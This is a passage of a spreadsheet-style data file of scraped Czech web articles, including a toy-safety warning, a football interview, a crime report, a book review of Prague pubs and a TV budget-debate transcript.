nejlepší film a režii. Jediného ocenění se nakonec skutečně dočkal režisér snímku Alexander Payne , ovšem v kategorii za nejlepší adaptovaný scénář společně se spoluscenáristou Jimem Taylorem . Za nejlepší scénář byli ocenění také Zlatým Glóbem, kde snímek rovněž bodoval v kategorii za nejlepší komedii nebo muzikál. Autor: mubruntal.cz</t>
  </si>
  <si>
    <t>1750</t>
  </si>
  <si>
    <t>20241201_109_3477026627_57cc1783d724e0aedde2.html</t>
  </si>
  <si>
    <t>57cc1783d724e0aedde2</t>
  </si>
  <si>
    <t>Při nákupech hraček si hlídejte kvalitu, některé výrobky mohou děti ohrozit na zdraví i na životě</t>
  </si>
  <si>
    <t>Při nákupech hraček si hlídejte kvalitu, některé výrobky mohou děti ohrozit na zdraví i na životě Hračka jako dárek pod stromeček bývá častou volbou, je tedy na místě připomenout na co si dát při nákupech věcí pro děti největší pozor. Některé předměty mohou představovat vážnou hrozbu, ať už z hlediska obsahu chemikálií, nebo co se týká nebezpečí vdechnutí či polknutí některých částí. I přes veškerou ochrannou legislativu je určitě dobré podrobit předměty také vlastní základní kontrole. Pokud pochybujete o původu, výrobci či prodejci hračky, to nejlepší řešení je takový výrobek nekupovat. „Hračky podle platné legislativy nesmějí způsobit dítěti jakékoli poranění nebo ho vystavit působení škodlivých chemických látek. To, aby hračka byla bezpečná a zdravotně nezávadná je povinen zajistit ten, kdo hračku vyrábí, dováží nebo ji pod svým jménem uvádí na trh. Tato povinnost navrhovat, vyrábět, zkoušet a uvádět na trh pouze bezpečné hračky je dána jednotnými pravidly v celé Evropské unii . Všichni ale vnímáme, že na trhu nejsou dostupné jen výrobky z prověřených zdrojů a od seriózních výrobců či dovozců. Je určitě dobré připomenout nyní, v období kdy mnozí nakupují dárky, že je potřeba být obezřetný,“ potvrzuje hlavní hygienička a ředitelka Státního zdravotního ústavu MUDr. Barbora Macková , MHA. Požadavky, které hračky musí splňovat, se vztahují na fyzikální a mechanické vlastnosti hraček, na jejich hořlavost, chemickou bezpečnost, omyvatelnost a hygienu. Spotřebitel to, zda hračka vyhovuje všem požadovaným kritériím, pozná tak, že na hračce či jejím obalu je uvedena značka shody s evropskými předpisy na bezpečnost hraček, označení CE. V podstatě tato značka je jakýmsi „pasem“ hračky pro vstup na trh EU. Bez tohoto označení nemůže být hračka dovezena a prodávána. Na trhu EU je pak dodržování stanovených kritérií, včetně značení a návodů na používání, kontrolováno orgány dozoru jednotlivých členských států, v ČR jsou kontrolními orgány Česká obchodní inspekce ( ČOI ) a Krajské hygienické stanice. „Ačkoli víme, že probíhají nejrůznější kontroly, osobně bych se vyvarovala nákupu až podezřele levných hraček z těžko ověřitelných zdrojů. Rizikové mohou být nákupy například z neověřených e-shopů nebo některých tržišť. Takovým varovným signálem, že například hračka z plastů by mohla obsahovat nebezpečné ftaláty, bývá nápadná měkkost či vláčnost materiálu a chemický zápach. Ftaláty se používají například jako látky, které změkčují plasty, pro lidský a zejména dětský organismus ale představují nebezpečí a v hračkách by se vůbec neměly vyskytovat. V epidemiologických studiích se zjistilo, že expozice některým ftalátům je spojena s poruchami reprodukčního systému zejména u chlapců, což může vést k jejich neplodnosti v dospělosti. Ftaláty jsou také spojovány se vznikem imunologických poruch, což může být příčinou vzniku astmatu, alergií a ekzémů. Současně narušují negativně i endokrinní systém, což může souviset i s rozvojem některých nádorových onemocnění, s inzulinovou rezistencí, obezitou, nebo s poruchami pozornosti a chování u dětí,“ uvádí příklad Ing. Jitka Sosnovcová, vedoucí Národní referenční laboratoře pro materiály určené pro styk s potravinami a pro výrobky pro děti do 3 let. Dalším příkladem je uvolňování primárních aromatických aminů z barviv a formaldehydu zejména z textilních hraček, dále uvolňování polycyklických aromatických uhlovodíků, nitrasaminů z hraček vyrobených z pryží, apod. „Jedná se opět vesměs o látky, které při dlouhodobé expozici mohou způsobovat rakovinu. A právě expozice těmto látkám v dětství může být jedním z faktorů při vzniků nádorů i v dospělosti,“ varuje odbornice SZÚ Ing. Jitka Sosnovcová. Problémem může být i použití zakázaných vonných alergenních látek, kterými mohou být parfemovány („navoněny“) některé hračky, případně i hračky imitující kosmetiku, aby byly pro děti přitažlivé. Tyto látky mohou způsobovat podráždění kůže, ale mohou i být příčinnou vzniku různých dětských alergií. Skrytým rizikem mohou být i nevhodně zvolené konzervační látky použité u hraček, které jsou určeny k přímému kontaktu s dětskou kůží. Tyto látky mohou mít dráždivé nebo senzibilizující účinky na citlivou dětskou pokožku. Jedná se zejména o hračky, jejichž účelem je zlepšení tvořivých schopností dítěte, jako jsou prstové barvy, modelíny, tekuté písky, slizy. Do hraček se konzervační látky přidávají kvůli omezení růstů plísní a mikroorganismů. Pro malé děti může být velkým problémem také to, pokud hračka obsahuje malé nebo snadno oddělitelné části, které mohou děti vdechnout nebo spolknout. V těchto případech hrozí dávení, dušení a v některých případech může dojít i k úmrtí dítěte. Příkladem mohou být různé skládačky či stavebnice obsahující malé části, ale i plyšové či textilní hračky s našitými prvky (knoflíky, korálky , magnety apod.). Z nedávné doby jsou i známy i případy spolknutí magnetů, které byly součástí hraček a které způsobily velice závažné zdravotní komplikace trávicího traktu a střev. Nebezpečné mohou být i konstrukční vady jako nestabilita či uvolňování šroubků či nýtů, kde existuje riziko fyzického poranění, jako například pořezání o ostré hrany nebo poranění šponami či třískami u špatně mechanicky opracovaných kovových či dřevěných hraček. Výrobci v rámci EU mají nastavena velice přísná pravidla pro to, jakým způsobem a z jakých materiálů může být hračka vyráběna. Dodržování těchto pravidel, používání kvalitních a hlavně bezpečných materiálů a zejména pravidelné zkoušení a prokazování souladu s kritérii stanovenými evropskými normami bývá ale finančně náročné a zpravidla se projeví i na ceně finální hračky. „I to může být impulsem pro některé výrobce či prodejce, aby se snažili systém obejít. Výsledky kontrol dozorových orgánů v členských zemích EU často ukazují na problémy u výrobců ze třetích zemí, a to zejména u těch, kteří prodávají hračky prostřednictvím online tržišť, kde často nelze ani identitu výrobce ověřit. Právě při nákupu na těchto tržištích si spotřebitelé musí být možných rizik vědomi, protože výrobky prodávané na takových platformách se jen obtížně a velmi sporadicky kontrolují a mnohem hůře realizovatelná jsou i následná vymáhání požadovaných nápravných opatření, včetně stahování výrobků z trhu,“ připomíná Ing. Jitka Sosnovcová. Nebezpečí, která číhají na trhu, je pro spotřebitele mnoho a ne vždy je v silách jednotlivce odhalit či jakkoli zkontrolovat kvalitu. Při nákupech se tedy vždy snažme zaměřit na seriózní zdroje, prověřené výrobce a prodejce, kteří jsou schopni doložit původ výrobků a předložit například certifikáty zdravotní nezávadnosti u konkrétního zboží. Pokud pochybujete o původu, výrobci či prodejci hračky, to nejlepší řešení je takový výrobek nekupovat, za ohrožení zdraví žádný takový nákup nestojí,“ uzavírá hlavní hygienička a ředitelka Státního zdravotního ústavu MUDr. Barbora Macková , MHA. (30.11.2024)</t>
  </si>
  <si>
    <t>20241201_11_3484619173_d62d647718923a29badd.html</t>
  </si>
  <si>
    <t>d62d647718923a29badd</t>
  </si>
  <si>
    <t>Bačkovský po Slavii: Můžeme si více uvědomit sílu, kterou máme</t>
  </si>
  <si>
    <t>Bačkovský po Slavii : Můžeme si více uvědomit sílu, kterou máme Tomáš Honzejk Praha / Liberec - Dlouho v Edenu držel náš tým ve hře skvělými zákroky, ale nakonec se ukázalo, že tvrdý souboj s Mojmírem Chytilem ze 40. minuty byl rozhodující. Brankář Hugo Jan Bačkovský se nejen k tomuto okamžiku vrátil v pozápasovém rozhovoru pro O2 TV. Tweet Slovan se pral, bojoval a kousal hlavně v úvodu zápasu. Na body to ale nestačilo. „Nasazení bylo velké. Nějaké šance jsme měli a je škoda, že jsme prohráli. Z těchto zápasů se Slavií nebo Spartou , které jsme prohráli o gól po dobrém výkonu, jsme chtěli bodovat. Samozřejmě nás mrzí, že z toho nic není,“ hlesl zklamaně. „Musíme být konzistentnější a bodů bude více.“ I přes prohru si z tohoto zápasu může vzít tým hodně. „Můžeme si více uvědomit sílu, kterou máme, když hrajeme naplno. Je pro nás výzva tyto výkony předvádět nejen proti Slavii , Spartě a Plzni, ale musíme v tom být konzistentnější a bodů budeme mít více. Třeba už příště něco uhrajeme,“ přál by si Bačkovský. O těsné prohře rozhodl jediný moment zápasu, kdy Chytil špičkou kopačky usměrnil Pechův pokus za záda ochránce naší svatyně. „Neviděl jsem to na videu, ale myslím si, že původní střela šla vedle. Můj dojem byl, že mě Chytil ve skluzu trefil. Mám nateklý loket a na něm šrámy. Možná kdybych udělal trochu divadlo, přihrál to a ležel tam, řešilo by se to více,“ zapřemýšlel nahlas. „Ať si řvou, mě to neuráží.“ Eden je znám skvělou atmosférou. Pro soupeře je nicméně někdy až nepřátelská, což pocítil také náš gólman při rozehře od své svatyně. „Nevím, co mi vyčítali. Slavia taky nerozehrávala zrovna nejrychleji. Nemyslím si, že bych nějak extra zdržoval,“ bránil se pětadvacetiletý brankář. Kromě pokřiků však občas něco také přilétne na hrací plochu. To už je za hranou. „Když si na mě fanoušci soupeře zařvou, chytá se mi skvěle a vůbec mi to nevadí. Když ale přilétne nějako pivo nebo na mě plivnou, už se porozhlédnu, kdo to byl. Pokud ale jen něco řvou, vůbec mě to neuráží,“ ujistil Bačkovský s klidem v hlase. Sdílej článek! Autor: Tomáš Honzejk Autor person Tomáš Honzejk</t>
  </si>
  <si>
    <t>20241201_110_3543248223_42548d679ec7518d0967.html</t>
  </si>
  <si>
    <t>42548d679ec7518d0967</t>
  </si>
  <si>
    <t>Alkehol</t>
  </si>
  <si>
    <t>Alkehol Divadlo, Kulturní centrum Hořovice Popis umělce Alkehol je česká rocková kapela, která vznikla v roce 1991. Alkehol založili v roce 1991 Ota Hereš a Petr Buneš , kteří jsou dodnes jejím základním jádrem. Jejich hospodské texty v rockovém a punkrockovém hávu dodnes oslovují fanoušky českého rocku. Mezi nejznámější hity Alkeholu patří písně jako Spalovač chlastu , Až se vrátím, Nonstop, O chlastu nebo Hospodo nalejvej. Napsali jsme o tomto umělci</t>
  </si>
  <si>
    <t>72</t>
  </si>
  <si>
    <t>20241201_111_3476966410_d617c189d1aa5445a653.html</t>
  </si>
  <si>
    <t>d617c189d1aa5445a653</t>
  </si>
  <si>
    <t>Svědci krvavého běsnění v Malackách: Ženu shozenou z balkonu zkopal, policistu trefil nožem</t>
  </si>
  <si>
    <t>Svědci krvavého běsnění v Malackách: Ženu shozenou z balkonu zkopal, policistu trefil nožem Vždy pozdravil, hned pomáhal a hádat se jsme je nikdy neslyšeli. Tak sousedé ze slovenských Malacek popisují Petera, který měl v noci z pátku na sobotu vyhodit manželku z balkonu, pod okny ji surově napadnout a nožem zranit ty, kteří se snažili ženě pomoci. Mezi napadenými byli i policisté, kteří měli problém muže zpacifikovat. Co přesně sousedé osudný večer prožívali, líčili pro web Nový Čas. Do bytu se podle zdrojů slovenského webu měli manželé přestěhovat před deseti lety. Jedná se o silné kuřáky, protože měli trávit většinu času společně na balkóně. Že jednou dojde k brutálnímu napadení ženy a ohrožování sousedů nožem , nikdo nepředvídal. „Když přivezli souseda z nemocnice, hned pomáhal. Vždy pozdravil, moc toho nenamluvil, ale pomáhal. Jeho manželka jen zdravila, byla tišší,“ sdělil slovenským novinářům zdroj s tím, že manželé často vyráželi na motorkářské srazy. „Vždy šli spolu. Hádky jsme z jejich bytu nikdy neslyšeli,“ pokračovali sousedé. Křičela, ať jí někdo pomůže V osudnou noc však došlo k ostré výměně názorů mezi manželi. „Šla jsem si zapálit, když jsem uviděla pod balkónem ležet ženu. Křičela: ‚Pomozte mi!‘ Měla na sobě bundu. V té tmě nebylo hned vidět, co se stalo a kdo to je, ale hned jsem volala policii,“ líčila sousedka. Dodala, že když se na balkóně objevila kvůli křiku další žena, měl na ni útočník křičet, že ji zabije. Na místo brzy dorazili policisté. „Přišli tři státní policisté s jednou ženou – a nevěděli, jak ho zpacifikovat. Policistku hned udeřil do tváře a křičel: ‚Policejní brutalita, točte si mě‘,“ gradovali osudné momenty. Napadl i svou manželku, která bezvládně ležela na zemi. „Umíte si představit tu hrůzu, kdy někdo bezvládně leží na zemi a náhle mu na obličeji přistane květináč? Nevyhazoval věci jen tak, ale házel je po ní. Umíte si představit, co to bylo, když vyšel ven, odhrnul jí bundu a ještě jí kopl do břicha? Kdyby měl střelnou zbraň, tak nás asi vystřílí,“ vypověděla svědkyně. Australský soud poslal na doživotí do vězení pracovníka péče o děti, který znásilnil nebo sexuálně zneužil téměř 70 holčiček. Jeho oběti byly ve věku od jednoho roku do sedmi let. Sedmačtyřicetiletý Ashley Paul Griffith se přiznal k 307 trestným činům, které spáchal především v centrech péče o děti v australském státě Queensland mezi lety 2003 a 2022, píše web stanice BBC. Na pomoc ženě vyrazili muži z vedlejšího domu. Na agresora křičeli, když se vrhl k plotu a zaútočil nožem na jednoho z nich. „Tohle když někdo udělá jiné lidské bytosti, to, co udělal té ženě... Neumím si představit, až ho pustí,“ dodala svědkyně. Novináři se na místo brutálního útoku dostavili v sobotu ráno. „Byli jsme zděšení. Na zemi se válely rozbité květináče, dokonce i kávovar. Balkón, odkud měla žena vypadnout, byl od krve, stejně tak skleněná výplň vchodových dveří,“ popisovali pohled na scénu. Žena ve vážném stavu skončila v nemocnici Podle vyjádření policejní mluvčí Jany Šimunkové měla žena z balkonu vypadnout v pátek kolem 21:30. „Žena měla následně ležet na zemi. Dle oznámení měla žena vypadnout po konfliktu s jinou osobou v prostorách bytu z balkónu na prvním poschodí. Policisté po příchodu na místo informace z oznámení prověřili a potvrdili. Podezřelý muž byl omezen na osobní svobodě,“ líčila. Zraněnou ženu následně záchranáři převezli ve vážném stavu do nemocnice. „Zjištění přesných příčin a okolností, které předcházely jejímu pádu, stejně jako události následující po tomto skutku, se zabývají policisté odboru kriminální policie Okresního ředitelství PZ v Malackách ,“ doplnila mluvčí. Dle posledních informací měl být muž pod vlivem alkoholu a fyzicky napadnout čtyři osoby, jimž způsobil mnohočetná zranění. Po strážníkovi měl dokonce hodit kuchyňský nůž a trefit ho do hrudníku. Agresor by měl být stíhán pro trestný čin ublížení na zdraví ve fázi pokusu a pro trestný čin napadení veřejného činitele. spolupráce online a TV redakce Autor: CNN Prima NEWS | spolupráce online a TV redakce | Všechny články autora || FTV Prima</t>
  </si>
  <si>
    <t>494810</t>
  </si>
  <si>
    <t>20241201_112_3476917786_64f4fd06377ea1b80139.html</t>
  </si>
  <si>
    <t>64f4fd06377ea1b80139</t>
  </si>
  <si>
    <t>Máte chuť Na jedno? Nebo rovnou na 50 příběhů pražských pivnic?</t>
  </si>
  <si>
    <t>Máte chuť Na jedno? Nebo rovnou na 50 příběhů pražských pivnic? 1.12.2024 / Petr Sojka , Na jedno. Padesát příběhů pražských pohostinství, pivnic a putyk. Grada 2024. Hned na úvod musím říci, že mě tato knížka opravdu velice bavila. Nejsem sice takovou milovnicí chmelového moku, ale zato mám ráda příběhy spjaté s historií a konkrétním místem. Nevyhledávám ani tak veliké učebnicové události, kterých se nám v době školní výuky dostalo požehnaně, jako spíše dějiny každodennosti a příběhy minulosti, na něž se již mohlo zapomenout a jež se tak nejlépe oprašují třeba právě vstupem do prostor, kde dříve stála či ještě stojí stavba, jež – jak se říká – toho hodně pamatuje. S knížkou Na jedno se tak díky autorovi dostanete na padesát… nikoliv snad vašich půl litrů piva , ale hlavně tedy příběhů různých hospod, pivnic a putyk. Pravdou je, že kdybyste si skutečně při každé zastávce jednu takovou sklenici dali, nejspíš by se vám záhy rozpíjela písmenka. Příběhy jsou psané lehce i humorně, ale stejně tak je s nimi často spojen smutný až tragický konec Když do míst, kam se lidé chodí bavit, vstoupí příběh spojený s vraždou, rvačkou nebo státní bezpečností, lze předpokládat, že původní setkání neskončí dobře. Zneužívání politické moci způsobilo mnoho křivd. Jen málokdo z těžké doby mohl vydat něco, co celou tragédii ponižování lidské důstojnosti ve své podstatě zesměšnilo a nakonec posílilo. A to za předpokladu, že se čtenář dokázal na vše dívat s nadhledem a stejnýma očima jako třeba autor Osudů dobrého vojáka Švejka. V nich – jak známo – Jaroslav Hašek zesměšňuje pro danou dobu typické udavačství, jehož efekt se na prostém Švejkovi jakoby míjel účinkem. Právě první příběh vypráví o Jaroslavu Haškovi a o jeho hostincích. Lepší začátek si čtenář nemohl ani přát. Jaroslav Hašek je legenda, nejen literární, ale také muž, jehož hrdlem bylo prolito mnoho litrů piva . Jaroslav Hašek byl svéráz a díky bohu za něj. A že se cítil v takových podnicích „jako doma“, stalo se zde mnoho příhod, které se oprašují ještě tolik let po jeho smrti. Jedna z historek popisuje, jak mezi přátele přivedl svého syna. V kavárně si dítě podávali z ruky do ruky a Hašek zářil nejvyšší spokojeností. Naposledy uvázl maličký Hašek u slečny v kuchyni. Po krátké partii kulečníku spisovatel na syna zapomněl a společnosti navrhl, aby se šlo do vinárny. Bylo veliké štěstí, že kavárník znal adresu obydlí Haškovy ženy. Poručil, aby slečna odnesla děťátko matce, protože se prý Hašek může po synovi shánět až za několik dní. A zkušený muž se nemýlil. Hašek vpadnul do kavárny třetího dne, ušpiněn a nevyspalý, a chraplavě křičel od vchodu: „Vraťte mi mého syna! Chci své dítě nazpět!“ Po té, co s Haškem v rámci stránek v knížce projdete několik jeho oblíbených hospod, můžete se vrhnout na další příběhy vztahující se k hostincům jako U Rozvařilů, U Dandů, U Vatšů, U Kosů, U Zavadilů, U Labutě, U Králíka a mnoho dalších. Některé dnes již neexistují, jiné se ještě dochovaly. Mezi všemi mne více zaujala jedna, která zvenčí lákala své hosty velmi netradičně. Restaurace U Slona. A jak název napovídá – její lákavou dominantou byl právě obrovský, nikoliv však živý slon, původně umístěný na jubilejní výstavě. Jednalo se o obrovskou sochu, vytvořenou sochařem Karlem Novákem. Pochopitelně, že taková obrovská rarita už z dálky lákala všechny lidi, včetně dětí. Přímo na výstavě také vznikla úplně nová společnost, která měla své hlavní sídlo právě v restauraci U Slona. Jmenovala se Bajkajlaj a na její počest vznikla okamžitě i chytlavá píseň, která se hraje a zpívá dosud: Praha je všech Čechů ráj, ať žije Bajkajlaj…“ Údajně právě U Slona také Karel Hašler společnosti Bajkajlaj poprvé zazpíval jeden ze svých největších hitů… Později se obrovský slon přestěhoval na nové místo, aby mohl přinést dalšímu podnikateli podobný úspěch. Jeho příběh pokračoval dál, až do smutných konců, kdy se v závěru druhé světové války bavili vlasovci střelbou na ono „nebohé zvíře“ a později komunisté restauraci zabavili. V roce 1969 bylo vystaveno úřední nařízení, aby se torzo slavného slona zbouralo. K čemuž došlo v roce 1974. Komunistický režim stál za zánikem řady podniků Jako například U Kosů. Když komunisté hospodu zavřeli, „dokonce si přijeli i pro židle, přestože byly majetkem rodiny Kosových. Hospoda i velký taneční sál, přistavěný v roce 1925, pak sloužily jako sklad a později jako truhlářská dílna.“ Těch nostalgických ale i emočně silných příběhů je v knize nespočet. Nerada bych odkrývala příliš, abych vás neokradla o zajímavé čtení. Na celé knížce mě mrzí jen jediná věc, a to je kvalita fotografií. Jsou příliš malé, je jich několik na jedné stránce a mnohdy je těžké rozeznat detaily. Přitom takto skvěle textově propracovaná knížka by si zasloužila i kvalitní obrazovou přílohu. Možná budou obrázky lépe rozeznatelné v e-knize, kde si lze stránky více přiblížit. Nicméně, až na tuto drobnost všem publikaci vřele doporučuji a věřím, že pokud nejste z Prahy , pak při návštěvě hlavního města by vás mohl některý takový příběh svést, abyste se podívali na místo, kde dříve vzkvétala právě nějaká taková zajímavá „putyka“. Petr Sojka , redaktor magazínu Z metropole ČT, tvůrce pořadu Tajemství pražských dvorků, je také autorem knih Pražské dvorky, Příběhy pražských dvorků, Z tajů pražských dvorků a Praha v proměnách času (ta vyšla rovněž jako audiokniha). MB Píši do několika médií a chci udělat maximum pro www.superrodina.cz, která by se měla stát jedním z nejčtenějších médií na českém internetu. Věřím, že i mnozí čtenáři se rádi budou spolupodílet na tvorbě tohoto specifického média. Mohlo by se vám také líbit Vyhledávání Nejnovější příspěvky Autor: superrodina Rubrika transition_slide Knihy</t>
  </si>
  <si>
    <t>70</t>
  </si>
  <si>
    <t>97</t>
  </si>
  <si>
    <t>20241201_113_3476905503_d2a8d794ee3d6e1351ce.html</t>
  </si>
  <si>
    <t>d2a8d794ee3d6e1351ce</t>
  </si>
  <si>
    <t>Jak se z obyčejného večera stane nezapomenutelný mejdan bez přípravy a s nečekanými hosty</t>
  </si>
  <si>
    <t>Jak se z obyčejného večera stane nezapomenutelný mejdan bez přípravy a s nečekanými hosty autor: Redakce Nezdrave.cz | 01.12.2024 | Kecy Představte si, že se chystáte na obyčejný večer. Někde na pozadí vibruje vaše oblíbená muzika, pár kamarádů slíbených na skleničku a nikdo netuší, že se z této banalitu stane večírek, o kterém se bude mluvit ještě dlouho po půlnoci. Jaké překvapení nás může potkat a jak to může dopadnout? Odpověď na tuto otázku není nikdy jednoduchá, ale jedno je jasné: magie spočívá v neplánovanosti. Pohodlnost versus spontaneita Když se jedná o organizaci večírku, většina z nás má tendenci plánovat a připravovat se jako při vojenské operaci. Ale co když se místo toho rozhodnete hodit vše za hlavu a nechat se unášet okamžikem? Místo bourání hlavy nad tím, jakými chlebíčky zapůsobit na své hosty, buďte v pohodě. Zajímavý fakt: vědecký tým Univerzity v Exeteru zjistil, že spontánní události vedou k daleko hlubšímu prožívání radosti než pečlivě naplánované akce. Tak co, k čemu všichni ti stříbrní ubrousky, když nakonec nevíte, kdo se na co poradí? Jasně, riskování může znamenat, že na stole skončí studená pizza a lahve, které byly v lednici od doby, kdy jste ještě nosili čepici s kšiltem. Na druhou stranu, věřte, že rozhodnutí hodit do mixéru alespoň trošku chaosu může přilákat ty záhadné neznámé, které touto anklikou přetvoří vaši domácnost na místo zábavy a absurdity. Zmínění nezvaní hosté mohou být ti lidé, které neznáte, ale svým způsobem se ve velkém večírkovém zápalu stávají jejími hlavními tvůrci. Kdy se ze sklenice vína stává nudná rutina Jakmile popíjíte svou oblíbenou značku vína v okruhu přátel a mluvíte o tom, jaká zásadní změna se udála na Twitteru, hrozí vám klopýtnutí do naprosté monotónnosti. A teď si představte, že se na vaší sešlosti octne neznámý člověk, který má talent skvěle imitovat slavné osobnosti. Najednou se atmosféra mění a vaše setkání nabírá jasný směr k dechberoucímu zábavnímu stand-upu, kde se směje nejen účinkující, ale i všichni, kdo si předtím mysleli, že je to další obyčejný večer. V tomto okamžiku si uvědomujete, že jakákoliv příprava je naprosto zbytečná. Síla neplánované zábavy je téměř magická. Třeba se vám podaří přivést na svět nový mém a bam, stali jste se tvůrcem virálního obsahu na sociálních sítích. To z vás udělá celebritu v očích těch, kteří byli navždy odsouzeni k neuvěřitelné nudě na gauči s popcornem. Nebojte se experimentovat, vystupte ze své komfortní zóny. Klidně si vyberte náhodného hosta, který se jen tak na vaší sešlosti objevil, a zkuste s ním vytvořit nezapomenutelnou kombinaci. A kdo ví, možná budete lídry módních trendů, které se zrodí u vás doma. Spontaneita je králem zábavy a jak víme, život by měl být jedna velká party. Aniž byste tušili, jak tento večer skončí, ujistěte se, že si užíváte každou minutu. Vzdáte se všech předsudků a umožníte, aby vás pohltila ta nečekaná euforie. Protože přesně v těchto okamžicích, kdy se nejméně hodí rozum, se rodí ty nejkrásnější vzpomínky, o kterých budete vyprávět dalším generacím. A pokud něco selže? Dobrou zprávou je, že zítra ráno to bude prostě další skvělý příběh, který můžete sdílet. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241201_114_3478290168_80116fa337b024a23fea.html</t>
  </si>
  <si>
    <t>80116fa337b024a23fea</t>
  </si>
  <si>
    <t>Cupovaný rozpočet. Proč?</t>
  </si>
  <si>
    <t>Cupovaný rozpočet. Proč? Moderátor Václav Moravec : Státní rozpočet jde do finále. Minulý týden po víc než šestihodinové debatě prošel druhým parlamentním čtením. Poslanci navrhli přesuny peněz za 224 miliardy korun. Jen hnutí SPD předložilo 35 návrhů za 140 miliard. Peníze chce SPD přidávat třeba na podporu bydlení, na školství a sport. Vzalo by je například z odvodů do rozpočtu Evropské unie nebo z rezervy státního rozpočtu. Zbyněk Stanjura / ODS /, ministr financí, 1. místopředseda strany, OVM, 24.11.2024: Oblíbená položka pozměňovacího návrhu je vládní rozpočtová rezerva. Všem jsem řekl, že tam je maximálně miliarda. A stejně jsou pozměňovací návrhy jednoho jediného poslance, který říká, dvě, tři miliardy z vládní rozpočtové rezervy a to prostě nejde, to je nezákonné. Moderátor Václav Moravec : Drtivá většina z pozměňovacích návrhů nejspíš neprojde. Premiér Petr Fiala si za svým rozpočtem stojí. Rozpočet příliš přeskládávat nechce. Petr Fiala / ODS /, premiér, předseda strany, 21.11.2024: Říkám s plnou odpovědností, že rozpočet je sestavený dobře, že rozpočet je sestavený odpovědně. Moderátor Václav Moravec : S tím nesouhlasí nejen opozice, pochybnosti má i Národní rozpočtová rada. Některé příjmové položky považuje, citujme, za nadhodnocené. Ministr financí Zbyněk Stanjura se brání. Zbyněk Stanjura / ODS /, ministr financí, 1. místopředseda strany, 24.10.2024: Oni označili za potenciálně rizikové zhruba půl procenta příjmů, zhruba 10 miliard a celkové příjmy jsou skoro 2000 miliard. Takže s tím půl procentem si poradí každý. Mojmír Hampl , předseda Národní rozpočtové rady, 24.10.2024: Bez sumy, kterou my jsme takto identifikovali, by vláda nebyla schopná pokračovat v tom úsilí o snižování deficitu. To je ten vtip. Jo? Ta suma je přesně ta, kterou nebo téměř přesně ta, kterou slíbila, že bude dál konsolidovat. Moderátor Václav Moravec : S výhradami Národní rozpočtové rady souzní poradci prezidenta republiky. Ti kvůli nevyjasněným položkám váhají doporučit prezidentu rozpočet podepsat. Jako zásadní vidí například zdroj dotací na obnovitelné zdroje, odhadované příjmy z emisních povolenek nebo způsob odměňování nepedagogických pracovníků. Vladimír Bezděk, poradce prezidenta pro důchodovou reformu, rozpočtovou politiku a finanční sektor, 18.11.2024: To všechno vytváří otazníky nad tím, do jaké míry ten návrh rozpočtu respektuje to, že je sestaven v souladu s existující a platnou legislativou. Petr Pavel , prezident republiky, 19.11.2024: Já bych rád buďto měl dostatečné důvody k tomu, abych rozpočet vetoval jako nutné opatření. Anebo si byl jist, že i ty nedostatky je třeba, které vykazuje, jsou zvládnutelné. Moderátor Václav Moravec : Třetí čtení návrhu státního rozpočtu se má konat už příští týden. Premiér Petr Fiala je přesvědčen, že spolu s ministrem financí Zbyňkem Stanjurou státní rozpočet před prezidentem obhájí. K výhradám, které zaznívají z Hradu, se všichni tři mají sejít po 7. prosinci. Moderátor Václav Moravec : Dodejme, že návrh státního rozpočtu na příští rok, vládní návrh počítá se schodkem dvě stě čtyřiceti jedné miliardy korun. Dalšími hosty Otázek jsou avizovaní ekonomka, poradkyně premiéra, členka NERVu a hlavní ekonomka Raiffeisenbank Helena Horská . Vítejte po čase v Otázkách. Hezké nedělní odpoledne. ¨ Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Děkuji za pozvání a krásné odpoledne. Moderátor Václav Moravec : A mé pozvání přijal i místopředseda sněmovního rozpočtového výboru, poslanec Jan Hrnčíř z SPD . Vítejte, hezký dobrý den. Jan Hrnčíř / SPD /, poslanec a místopředseda Výboru pro rozpočet PSP ČR: Dobrý den všem. Moderátor Václav Moravec : Vetovala byste rozpočet, pokud byste byla prezidentkou? Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Tak to je těžká otázka. Ježiš, do role prezidentky jsem se teda nikdy nepostavila. Situace je komplikovaná,… Moderátor Václav Moravec : Ale rozpočet znáte… Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : … a asi bych také, rozpočet znám, takže tady z té situaci mám tu, to rozhodnutí jednodušší. Nicméně určitě bych chtěla diskutovat s panem ministrem financí o těch otázkách, které nad rozpočtem visí. A také bych od něj chtěla slyšet závazek, že další schvalování rozpočtu bude daleko transparentnější, daleko srozumitelnější. Bude opatrnější, to znamená, bude naplňovat všechna zlatá pravidla, jak by se veřejné rozpočty měly schvalovat. A tento závazek bych od nich určitě chtěla slyšet. Moderátor Václav Moravec : Ale ten závazek už tady byl i loni. Protože i loni měla Národní rozpočtová rada výhrady ke státnímu rozpočtu, má je i letos. Proč byste nevetovala rozpočet? Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : Protože je to rozpočet, je to klíčový rozpočet nebo je to klíčový zákon této vlády. A vlastně rozpočet jako takový je vlastně klíčový zákon, který určuje hospodářskou politiku vlády na příští rok. A je velmi důležitý a je důležité ho připravit včas. A my se posouváme v čase už zase na hraně, kdy nám příliš času pro vyjednávání nezbývá. A v době, kdy tady kolem nás se vrší nejistota, komplexita vlastně narůstá, ekonomika i firmy jsou stále ve větší nejistotě, tak přilévat ještě olej do ohně s tím, že budeme na hraně na konci roku s přijetím zákona. A nedej bože budeme ohrožovat situaci, že by byl nucen i třeba nějaké rozpočtové pravidlo, tak bych raději šla do vyjednávání než do veta. Popřípadě máme tady jednu variantu, kterou ale pan prezident avizoval, že nerad bude používat ten tzv. nepodpis. Ale to pan prezident avizoval, že to je cesta, kterou on nerad, obecně tedy v tom vyjádření avizoval, že nerad na takovouhle cestu přistupuje. Takže za mě myslím si, že je potřeba nastavit znova pravidla rozpočtové zodpovědnosti. A za mě rozpočet, který je klíčový zákon roku, by měl být sestavován velmi obezřetně s ohledem na predikovatelnost, odbornost a důvěryhodnost. A hlavně za mě se bohužel ten zákon stal obětí té legislativní, řekněme toho legislativního chaosu, o kterém jste mimochodem diskutovali teďka v předchozích částech Otázek. Moderátor Václav Moravec : Téměř hodinu a půl, přesně tak. Helena Horská, poradkyně premiéra, členka NERV, hlavní ekonomka Raiffeisenbank : A to je za mě velmi smutné, protože klíčový zákon a klíčový nástroj hospodářské politiky by neměl být obětí snížené legislativní kultury. Moderátor Václav Moravec : Pane 